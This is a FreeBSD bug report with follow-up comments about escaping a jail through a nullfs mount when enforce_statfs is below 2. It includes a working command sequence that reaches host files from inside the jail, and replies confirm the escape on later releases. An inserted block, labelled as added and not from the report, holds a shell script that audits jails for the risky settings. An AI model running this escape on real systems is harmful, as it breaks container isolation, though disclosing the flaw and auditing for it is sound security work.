Bug 262180

Summary: jail escaping via jail-friendly nullfs
Product: Base System
Reporter: firk
Component: kern
Assignee: freebsd-bugs (Nobody)
Status: Open
Severity: Affects Only Me
CC: chris, crest, dch, emaste, grahamperrin, monwarez, pat, tom
Priority: ---
Keywords: needs-qa, security
Version: 12.3-RELEASE
Hardware: Any
OS: Any

Description firk 2022-02-24 23:43:32 UTC
A jail could be escaped when run with enforce_statfs<2, allow.mount=true, allow.mount.nullfs=true.

prepare jail environment
> mkdir /j/1
> tar -c -f - /bin /lib /libexec /sbin | tar -x -f - -C /j/1
> mkdir /j/1/tmp

start a vulnerable jail
> jail -c path=/j/1 persist=false allow.mount=true allow.mount.nullfs=true enforce_statfs=1 command=/bin/sh

malicious code
> mkdir /tmp/a /tmp/a/b/c /tmp/a/b/c/test /tmp/a/d
> mount -t nullfs /tmp/a/b/c /tmp/a/d
> cd /tmp/a/d/test
> mv /tmp/a/b/c/test /tmp/a/b/test
> ls -al ../../../../..
> ls -al ../../../../../..

You will see the files outside the jail.
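The report ties the escape to one parameter combination: enforce_statfs below 2 together with allow.mount and allow.mount.nullfs enabled. The following audit helper is an added example, not part of the bug report or of FreeBSD: it reads one jail per line in the name=value form that `jls -n` prints (assumed here: booleans appear as allow.mount / allow.nomount and allow.mount.nullfs / allow.mount.nonullfs) and lists the jails whose settings match that combination, so an administrator can raise enforce_statfs to 2 or disable allow.mount.nullfs on them.

```shell
#!/bin/sh
# Added audit helper (not from the bug report). Reads `jls -n` style lines on
# stdin and prints the jails that combine enforce_statfs<2 with allow.mount and
# allow.mount.nullfs, the combination the report identifies. The token forms
# below are an assumption about the `jls -n` output format.
flag_nullfs_escape_risk() {
    while read -r line; do
        name=""; statfs=""; mount=0; nullfs=0
        for tok in $line; do
            case "$tok" in
                name=*)               name=${tok#name=} ;;
                enforce_statfs=*)     statfs=${tok#enforce_statfs=} ;;
                allow.mount)          mount=1 ;;
                allow.nomount)        mount=0 ;;
                allow.mount.nullfs)   nullfs=1 ;;
                allow.mount.nonullfs) nullfs=0 ;;
            esac
        done
        [ -n "$name" ] || continue
        # Missing enforce_statfs is treated as the default of 2 (not flagged).
        if [ "$mount" -eq 1 ] && [ "$nullfs" -eq 1 ] && [ "${statfs:-2}" -lt 2 ]; then
            printf '%s enforce_statfs=%s allow.mount allow.mount.nullfs\n' "$name" "$statfs"
        fi
    done
}

# Constructed sample of `jls -n` output for offline use: only "build" matches.
SAMPLE='name=web enforce_statfs=2 allow.mount allow.mount.nullfs
name=build enforce_statfs=1 allow.mount allow.mount.nullfs
name=db enforce_statfs=1 allow.nomount allow.mount.nonullfs'

# Runs the audit over the constructed sample and returns the flagged lines.
audit_sample() {
    printf '%s\n' "$SAMPLE" | flag_nullfs_escape_risk
}
```

On a live host the intended invocation is `jls -n name enforce_statfs allow.mount allow.mount.nullfs | flag_nullfs_escape_risk`.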
Comment 1 Graham Perrin freebsd_committer freebsd_triage 2023-06-21 23:33:04 UTC
> 12.3-RELEASE

No longer supported. 

Can you reproduce symptoms with a supported RELEASE? 

<https://www.freebsd.org/security/#sup>

Thank you.
Comment 2 crest 2023-07-25 09:27:19 UTC
Where in your sequence of commands did you attach to the jail? It's the jail that's locking in processes, not the nullfs. Outside of the jail you're expected to be able to leave the nullfs with `cd ..`. Or did I misunderstand, and the nullfs mount from inside the jail is able to expose a path from beneath the jail under the jail root directory despite the (n)mount performed inside the jail? If this is the case, just ignoring it because the release is EoL is a cheap cop-out, and we have to define what the expected semantics for nullfs mounting at different enforce_statfs levels are.
Comment 3 firk 2023-11-24 22:44:59 UTC
(In reply to Graham Perrin from comment #1)

> Can you reproduce symptoms with a supported RELEASE? 

Yes it still works on 14.0-RELEASE.
Comment 4 firk 2023-11-24 22:46:03 UTC
(In reply to crest from comment #2)

> Where in your sequence of of commands did you attach to the jail?

The "jail" command does this (create+attach).
Comment 5 Thibault Payet 2024-07-12 18:11:24 UTC
This can be reproduced on 14.2 as well. (Note the need to pass -p for mkdir.)
Comment 6 Thibault Payet 2024-07-13 12:02:52 UTC
(In reply to Thibault Payet from comment #5)
Note that this does not work on ZFS if each jail is in a separate dataset. See the result when using a dataset for /j:

zfs create zroot/j
zfs set mountpoint=/j zroot/j
mkdir /j/1
mkdir -p /tmp/a /tmp/a/b/c /tmp/a/b/c/test /tmp/a/d
mount -t nullfs /tmp/a/b/c /tmp/a/d
cd /tmp/a/d/test/
mv /tmp/a/b/c/test /tmp/a/b/test

ls -al ../../../../..
returns

ls: ..: No such file or directory
total 2
drwxr-xr-x  3 0 0 3 Jul 13 11:54 .
drwxr-xr-x  7 0 0 7 Jul 13 11:54 1

and
ls -al ../../../../../..
returns
ls: ../../../../../..: No such file or directory